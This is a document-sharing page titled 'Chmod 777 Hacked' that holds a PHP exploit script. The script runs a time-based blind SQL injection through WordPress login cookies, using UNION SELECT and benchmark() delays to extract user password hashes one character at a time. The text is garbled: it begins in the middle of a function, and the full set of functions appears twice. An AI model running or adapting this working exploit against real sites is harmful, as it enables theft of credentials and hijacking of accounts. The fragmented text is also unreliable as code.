Chmod 777 Hacked
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Chmod 777 Hacked as PDF for free.
More details
- Words: 747
- Pages: 5
$ch\n";
$out .= "$ch"; echo "current value for $field: $out \n"; } echo "\nfinal result: $field=$out\n\n"; return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where id=%d and if(ord(substring($field,$pos,1))%s,benchmark($cnt,md5(1337)),3)/*"; // first let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post); if($letter) { $min = 97; $max = 102; echo "char to find is [a-f]\n"; } else { $min = 48; $max = 57; echo "char to find is [0-9]\n"; } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $inj = sprintf($ipattern, $prefix, $id, "=$max"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; }
$half = intval(floor($area / 2)); $curr = $min + $half; $inj = sprintf($ipattern, $prefix, $id, ">$curr"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } echo "curr: $curr--$max--$min\n"; } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url, $norm_delay; $bret = false; $maxtry = 10; $try = 1; while(1) { $start = getmicrotime(); $buff = make_post($url, $p); $end = getmicrotime(); if($buff === '-1') { break; } else { echo "test_condition() - try $try - invalid return value ...\n"; $try ++; if($try > $maxtry) { die("too many tries - exiting ...\n"); } else { echo "trying again - try $try ...\n"; } } } $diff = $end - $start; $delay = intval($diff * 10);
if($delay > ($norm_delay * 2)) { $bret = true; } return $bret; } /////////////////////////////////////////////////////////////////////// function get_normdelay($testcnt) { $fa = test_md5delay(1); echo "$fa\n"; $sa = test_md5delay($testcnt); echo "$sa\n"; $fb = test_md5delay(1); echo "$fb\n"; $sb = test_md5delay($testcnt); echo "$sb\n"; $fc = test_md5delay(1); echo "$fc\n"; $sc = test_md5delay($testcnt); echo "$sc\n"; $mean_nondelayed = intval(($fa + $fb + $fc) / 3); echo "mean nondelayed - $mean_nondelayed dsecs\n"; $mean_delayed = intval(($sa + $sb + $sc) / 3); echo "mean delayed - $mean_delayed dsecs\n"; return $mean_delayed; } /////////////////////////////////////////////////////////////////////// function test_md5delay($cnt) { global $url, $id, $prefix, $suffix; // delay in deciseconds $delay = -1; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = ' union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where id=%d and if(length(user_pass)>31,benchmark(%d,md5(1337)),3)/*'; $inj = sprintf($ipattern, $prefix, $id, $cnt); $post = sprintf($ppattern, $suffix, $inj, $suffix); $start = getmicrotime(); $buff = make_post($url, $post); $end = getmicrotime(); if(intval($buff) !== -1) { die("test_md5delay($cnt) - invalid return value, exiting ..."); } $diff = $end - $start; $delay = intval($diff * 10); return $delay; }
/////////////////////////////////////////////////////////////////////// function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = false) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, curlopt_url, $url); curl_setopt ($ch, curlopt_returntransfer, 1); curl_setopt ($ch, curlopt_connecttimeout, $timeout); curl_setopt($ch, curlopt_post, 1); curl_setopt($ch, curlopt_postfields, $post_fields); curl_setopt($ch, curlopt_followlocation, 0); curl_setopt ($ch, curlopt_useragent, 'mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727)'); if(!empty($cookie)) { curl_setopt ($ch, curlopt_cookie, $cookie); } if(!empty($referer)) { curl_setopt ($ch, curlopt_referer, $referer); } if($headers === true) { curl_setopt ($ch, curlopt_header, true); } else { curl_setopt ($ch, curlopt_header, false); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($buf) { global $outfile; $buf .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $buf); fclose($fh); } /////////////////////////////////////////////////////////////////////// ?>
$out .= "$ch"; echo "current value for $field: $out \n"; } echo "\nfinal result: $field=$out\n\n"; return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where id=%d and if(ord(substring($field,$pos,1))%s,benchmark($cnt,md5(1337)),3)/*"; // first let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post); if($letter) { $min = 97; $max = 102; echo "char to find is [a-f]\n"; } else { $min = 48; $max = 57; echo "char to find is [0-9]\n"; } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $inj = sprintf($ipattern, $prefix, $id, "=$max"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; }
$half = intval(floor($area / 2)); $curr = $min + $half; $inj = sprintf($ipattern, $prefix, $id, ">$curr"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } echo "curr: $curr--$max--$min\n"; } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url, $norm_delay; $bret = false; $maxtry = 10; $try = 1; while(1) { $start = getmicrotime(); $buff = make_post($url, $p); $end = getmicrotime(); if($buff === '-1') { break; } else { echo "test_condition() - try $try - invalid return value ...\n"; $try ++; if($try > $maxtry) { die("too many tries - exiting ...\n"); } else { echo "trying again - try $try ...\n"; } } } $diff = $end - $start; $delay = intval($diff * 10);
if($delay > ($norm_delay * 2)) { $bret = true; } return $bret; } /////////////////////////////////////////////////////////////////////// function get_normdelay($testcnt) { $fa = test_md5delay(1); echo "$fa\n"; $sa = test_md5delay($testcnt); echo "$sa\n"; $fb = test_md5delay(1); echo "$fb\n"; $sb = test_md5delay($testcnt); echo "$sb\n"; $fc = test_md5delay(1); echo "$fc\n"; $sc = test_md5delay($testcnt); echo "$sc\n"; $mean_nondelayed = intval(($fa + $fb + $fc) / 3); echo "mean nondelayed - $mean_nondelayed dsecs\n"; $mean_delayed = intval(($sa + $sb + $sc) / 3); echo "mean delayed - $mean_delayed dsecs\n"; return $mean_delayed; } /////////////////////////////////////////////////////////////////////// function test_md5delay($cnt) { global $url, $id, $prefix, $suffix; // delay in deciseconds $delay = -1; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = ' union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where id=%d and if(length(user_pass)>31,benchmark(%d,md5(1337)),3)/*'; $inj = sprintf($ipattern, $prefix, $id, $cnt); $post = sprintf($ppattern, $suffix, $inj, $suffix); $start = getmicrotime(); $buff = make_post($url, $post); $end = getmicrotime(); if(intval($buff) !== -1) { die("test_md5delay($cnt) - invalid return value, exiting ..."); } $diff = $end - $start; $delay = intval($diff * 10); return $delay; }
/////////////////////////////////////////////////////////////////////// function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = false) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, curlopt_url, $url); curl_setopt ($ch, curlopt_returntransfer, 1); curl_setopt ($ch, curlopt_connecttimeout, $timeout); curl_setopt($ch, curlopt_post, 1); curl_setopt($ch, curlopt_postfields, $post_fields); curl_setopt($ch, curlopt_followlocation, 0); curl_setopt ($ch, curlopt_useragent, 'mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727)'); if(!empty($cookie)) { curl_setopt ($ch, curlopt_cookie, $cookie); } if(!empty($referer)) { curl_setopt ($ch, curlopt_referer, $referer); } if($headers === true) { curl_setopt ($ch, curlopt_header, true); } else { curl_setopt ($ch, curlopt_header, false); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($buf) { global $outfile; $buf .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $buf); fclose($fh); } /////////////////////////////////////////////////////////////////////// ?>
